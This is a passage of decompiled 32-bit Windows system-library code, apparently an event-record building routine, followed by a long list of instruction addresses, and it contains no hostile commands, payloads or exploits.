				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E012E4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0125D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E012E5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x13060e8;
								if( *0x13060e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x13060e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E01259710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E01256DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0125F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0125F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0125F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0125FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0125FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0125F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0125F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E012E4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0126D130(_t427, _t494, _t511);
				}
			}










































































                                                    0x012e5ba5
                                                    0x012e5baa
                                                    0x012e5baf
                                                    0x012e5bb4
                                                    0x012e5bb6
                                                    0x012e5bbc
                                                    0x012e5bbe
                                                    0x012e5bc4
                                                    0x012e5bcd
                                                    0x012e5bd3
                                                    0x012e5bd6
                                                    0x012e5bdc
                                                    0x012e5be0
                                                    0x012e5be3
                                                    0x012e5beb
                                                    0x012e5bf2
                                                    0x012e5bf8
                                                    0x012e5bfe
                                                    0x012e5c04
                                                    0x012e5c0e
                                                    0x012e5c18
                                                    0x012e5c1f
                                                    0x012e5c25
                                                    0x012e5c2a
                                                    0x012e5c2c
                                                    0x012e5c32
                                                    0x012e5c3a
                                                    0x012e5c3f
                                                    0x012e5c42
                                                    0x012e5c48
                                                    0x012e5c5b
                                                    0x012e5c5b
                                                    0x012e5c2c
                                                    0x012e5cb7
                                                    0x012e5cb9
                                                    0x012e5cbf
                                                    0x012e5cc2
                                                    0x012e5cca
                                                    0x012e5ccb
                                                    0x012e5ccb
                                                    0x012e5cd1
                                                    0x012e5cd7
                                                    0x012e5cda
                                                    0x012e5ce1
                                                    0x012e5ce4
                                                    0x012e5ce7
                                                    0x012e5ced
                                                    0x012e5cf3
                                                    0x012e5cf9
                                                    0x012e5cff
                                                    0x012e5d08
                                                    0x012e5d0a
                                                    0x012e5d0e
                                                    0x012e5d10
                                                    0x00000000
                                                    0x00000000
                                                    0x012e5d16
                                                    0x012e5d1a
                                                    0x00000000
                                                    0x00000000
                                                    0x012e5d20
                                                    0x012e5d22
                                                    0x012e5d25
                                                    0x012e5d2f
                                                    0x012e5d2f
                                                    0x012e5d33
                                                    0x012e5d3d
                                                    0x012e5d49
                                                    0x012e5d4b
                                                    0x00000000
                                                    0x00000000
                                                    0x012e5d5a
                                                    0x012e5d5d
                                                    0x012e5d60
                                                    0x00000000
                                                    0x00000000
                                                    0x012e5d66
                                                    0x012e5d69
                                                    0x00000000
                                                    0x00000000
                                                    0x012e5d6f
                                                    0x012e5d6f
                                                    0x012e5d73
                                                    0x012e5d79
                                                    0x012e5d7f
                                                    0x012e5d86
                                                    0x012e5d95
                                                    0x012e5d98
                                                    0x012e5dba
                                                    0x012e5dcb
                                                    0x012e5dce
                                                    0x012e5dd3
                                                    0x012e5dd6
                                                    0x012e5dd8
                                                    0x012e5de6
                                                    0x012e5dec
                                                    0x012e5dee
                                                    0x012e5df1
                                                    0x012e5df3
                                                    0x012e635a
                                                    0x012e635a
                                                    0x00000000
                                                    0x012e635a
                                                    0x012e5dfe
                                                    0x012e5e02
                                                    0x012e5e05
                                                    0x012e5e07
                                                    0x012e5e10
                                                    0x012e5e13
                                                    0x012e5e1b
                                                    0x012e5e1c
                                                    0x012e5e21
                                                    0x012e5e22
                                                    0x012e5e23
                                                    0x012e5e25
                                                    0x012e5e2a
                                                    0x012e5e2c
                                                    0x012e5e2e
                                                    0x012e5e36
                                                    0x012e5e39
                                                    0x012e5e42
                                                    0x012e5e47
                                                    0x012e5e4d
                                                    0x012e5e54
                                                    0x012e5e54
                                                    0x012e5e54
                                                    0x012e5e2e
                                                    0x012e5e5c
                                                    0x012e5e5f
                                                    0x012e5e62
                                                    0x012e5e64
                                                    0x012e5e6b
                                                    0x012e5e70
                                                    0x012e5e7a
                                                    0x012e5e7a
                                                    0x012e5e7a
                                                    0x012e5e6b
                                                    0x012e5e7e
                                                    0x012e5e7f
                                                    0x012e5e7f
                                                    0x012e5e81
                                                    0x012e5e87
                                                    0x012e5e8b
                                                    0x012e5e8c
                                                    0x012e5e8c
                                                    0x012e5e8c
                                                    0x012e5e9a
                                                    0x012e5e9c
                                                    0x012e5ea2
                                                    0x012e5ea6
                                                    0x012e5f50
                                                    0x012e5f50
                                                    0x012e5f57
                                                    0x012e5f66
                                                    0x012e5f66
                                                    0x012e5f66
                                                    0x012e5f68
                                                    0x012e5f6a
                                                    0x012e63d0
                                                    0x00000000
                                                    0x012e5f70
                                                    0x012e5f70
                                                    0x012e5f91
                                                    0x012e5f9c
                                                    0x012e5f9e
                                                    0x012e5fa4
                                                    0x012e5fa6
                                                    0x012e638c
                                                    0x012e6392
                                                    0x012e63a1
                                                    0x012e63a7
                                                    0x012e63af
                                                    0x012e63af
                                                    0x012e63bd
                                                    0x012e63d8
                                                    0x00000000
                                                    0x012e63d8
                                                    0x012e5fac
                                                    0x012e5fb2
                                                    0x012e5fb4
                                                    0x012e5fbd
                                                    0x012e5fc6
                                                    0x012e5fce
                                                    0x012e5fd4
                                                    0x012e5fdc
                                                    0x012e5fec
                                                    0x012e5fed
                                                    0x012e5fee
                                                    0x012e5fef
                                                    0x012e5ff9
                                                    0x012e5ffa
                                                    0x012e5ffb
                                                    0x012e5ffc
                                                    0x012e6000
                                                    0x012e6004
                                                    0x012e6012
                                                    0x012e6012
                                                    0x012e6018
                                                    0x012e6019
                                                    0x012e601a
                                                    0x012e601b
                                                    0x012e601c
                                                    0x012e6020
                                                    0x012e6059
                                                    0x012e605c
                                                    0x012e6061
                                                    0x012e6061
                                                    0x012e6022
                                                    0x012e6022
                                                    0x012e6022
                                                    0x012e6025
                                                    0x012e602a
                                                    0x012e602b
                                                    0x012e6031
                                                    0x012e6037
                                                    0x012e6038
                                                    0x012e603e
                                                    0x012e6048
                                                    0x012e6049
                                                    0x012e604a
                                                    0x012e604b
                                                    0x012e604c
                                                    0x012e604d
                                                    0x012e6053
                                                    0x012e6054
                                                    0x012e6054
                                                    0x012e6062
                                                    0x012e6065
                                                    0x012e6067
                                                    0x012e606a
                                                    0x012e6070
                                                    0x012e6075
                                                    0x012e6076
                                                    0x012e6081
                                                    0x012e6087
                                                    0x012e6095
                                                    0x012e6099
                                                    0x012e609e
                                                    0x012e60a4
                                                    0x012e60ae
                                                    0x012e60b0
                                                    0x012e60b3
                                                    0x012e60b6
                                                    0x012e60b8
                                                    0x012e60ba
                                                    0x012e60ba
                                                    0x012e60ba
                                                    0x012e60ba
                                                    0x012e60be
                                                    0x012e60c0
                                                    0x012e60c5
                                                    0x012e60c5
                                                    0x012e60c5
                                                    0x012e60c6
                                                    0x012e60cd
                                                    0x012e6114
                                                    0x012e60cf
                                                    0x012e60cf
                                                    0x012e60d4
                                                    0x012e60d5
                                                    0x012e60da
                                                    0x012e60db
                                                    0x012e60e1
                                                    0x012e60e2
                                                    0x012e60e8
                                                    0x012e60f8
                                                    0x012e60fd
                                                    0x012e60fe
                                                    0x012e6102
                                                    0x012e6104
                                                    0x012e6107
                                                    0x012e6109
                                                    0x012e610b
                                                    0x012e610b
                                                    0x012e610b
                                                    0x012e610b
                                                    0x012e610f
                                                    0x012e610f
                                                    0x012e6117
                                                    0x012e611a
                                                    0x012e611f
                                                    0x012e6125
                                                    0x012e6134
                                                    0x012e6139
                                                    0x012e613f
                                                    0x012e6146
                                                    0x012e6148
                                                    0x012e614b
                                                    0x012e614d
                                                    0x012e614f
                                                    0x012e614f
                                                    0x012e614f
                                                    0x012e614f
                                                    0x012e6153
                                                    0x012e6159
                                                    0x012e6159
                                                    0x012e615c
                                                    0x012e6163
                                                    0x012e6169
                                                    0x012e616c
                                                    0x012e6172
                                                    0x012e6181
                                                    0x012e6186
                                                    0x012e6187
                                                    0x012e618b
                                                    0x012e6191
                                                    0x012e6195
                                                    0x012e61a3
                                                    0x012e61bb
                                                    0x012e61c0
                                                    0x012e61c3
                                                    0x012e61cc
                                                    0x012e61d0
                                                    0x012e61dc
                                                    0x012e61de
                                                    0x012e61e1
                                                    0x012e61e4
                                                    0x012e61e6
                                                    0x012e61e8
                                                    0x012e61e8
                                                    0x012e61e8
                                                    0x012e61e8
                                                    0x012e61e6
                                                    0x012e61ec
                                                    0x012e61f3
                                                    0x012e6203
                                                    0x012e6209
                                                    0x012e620a
                                                    0x012e6216
                                                    0x012e621d
                                                    0x012e6227
                                                    0x012e6241
                                                    0x012e6246
                                                    0x012e624c
                                                    0x012e6257
                                                    0x012e6259
                                                    0x012e625c
                                                    0x012e625e
                                                    0x012e6260
                                                    0x012e6260
                                                    0x012e6260
                                                    0x012e6260
                                                    0x012e625e
                                                    0x012e6264
                                                    0x012e6267
                                                    0x012e6269
                                                    0x012e6315
                                                    0x012e6315
                                                    0x012e631b
                                                    0x012e631e
                                                    0x012e6324
                                                    0x012e6327
                                                    0x012e632f
                                                    0x012e6330
                                                    0x012e6333
                                                    0x012e633a
                                                    0x012e633c
                                                    0x012e6335
                                                    0x012e6335
                                                    0x012e6335
                                                    0x012e633f
                                                    0x012e6342
                                                    0x012e634c
                                                    0x012e6352
                                                    0x012e6355
                                                    0x012e6355
                                                    0x012e6359
                                                    0x00000000
                                                    0x012e626f
                                                    0x012e6275
                                                    0x012e6275
                                                    0x012e6278
                                                    0x012e627e
                                                    0x012e627e
                                                    0x012e6281
                                                    0x012e6287
                                                    0x012e628d
                                                    0x012e6298
                                                    0x012e629c
                                                    0x012e62a2
                                                    0x012e629e
                                                    0x012e629e
                                                    0x012e629e
                                                    0x012e62a7
                                                    0x012e62a7
                                                    0x012e62aa
                                                    0x012e62b0
                                                    0x012e62f0
                                                    0x012e62f0
                                                    0x012e62f2
                                                    0x012e62f8
                                                    0x012e62fd
                                                    0x012e62b2
                                                    0x012e62b2
                                                    0x012e62b2
                                                    0x012e62b5
                                                    0x012e62dd
                                                    0x012e62e2
                                                    0x012e62e5
                                                    0x012e62b7
                                                    0x012e62b8
                                                    0x012e62bb
                                                    0x012e62bd
                                                    0x012e62c0
                                                    0x012e62c4
                                                    0x012e62cd
                                                    0x012e62cd
                                                    0x012e62c0
                                                    0x012e62bb
                                                    0x012e62b5
                                                    0x012e6302
                                                    0x012e6303
                                                    0x012e6305
                                                    0x012e6305
                                                    0x012e6305
                                                    0x012e630c
                                                    0x012e630c
                                                    0x00000000
                                                    0x012e627e
                                                    0x012e6269
                                                    0x012e5eac
                                                    0x012e5ebb
                                                    0x012e5ebe
                                                    0x012e5ecb
                                                    0x012e5ecb
                                                    0x012e5ece
                                                    0x012e5ece
                                                    0x012e5ed4
                                                    0x012e5ed7
                                                    0x012e5ed9
                                                    0x012e5edb
                                                    0x012e5edb
                                                    0x012e5ee1
                                                    0x012e5ee1
                                                    0x012e5ee3
                                                    0x012e5f20
                                                    0x012e5f20
                                                    0x012e5ee5
                                                    0x012e5ee5
                                                    0x012e5ee5
                                                    0x012e5ee8
                                                    0x012e5f11
                                                    0x012e5f18
                                                    0x012e5eea
                                                    0x012e5eea
                                                    0x012e5eed
                                                    0x012e5ef2
                                                    0x012e5ef8
                                                    0x012e5efb
                                                    0x012e5f0a
                                                    0x012e5f0a
                                                    0x012e5eed
                                                    0x012e5ee8
                                                    0x012e5f22
                                                    0x012e5f28
                                                    0x00000000
                                                    0x00000000
                                                    0x012e5f30
                                                    0x012e5f31
                                                    0x012e5f37
                                                    0x012e5f3a
                                                    0x012e5f3d
                                                    0x012e5f44
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x012e5f46
                                                    0x012e5f48
                                                    0x012e5f4d
                                                    0x00000000
                                                    0x012e5f4d
                                                    0x012e5dda
                                                    0x012e5ddf
                                                    0x00000000
                                                    0x012e5ddf
                                                    0x012e5dd8
                                                    0x012e5da7
                                                    0x012e5da9
                                                    0x012e5dac
                                                    0x012e5dae
                                                    0x00000000
                                                    0x012e5db4
                                                    0x012e5db4
                                                    0x00000000
                                                    0x012e5db4
                                                    0x012e5dae
                                                    0x012e5d88
                                                    0x012e5d8d
                                                    0x012e6363
                                                    0x012e6369
                                                    0x012e636a
                                                    0x012e6370
                                                    0x012e6372
                                                    0x012e637a
                                                    0x012e637b
                                                    0x012e637d
                                                    0x00000000
                                                    0x00000000
                                                    0x012e637f
                                                    0x012e6385
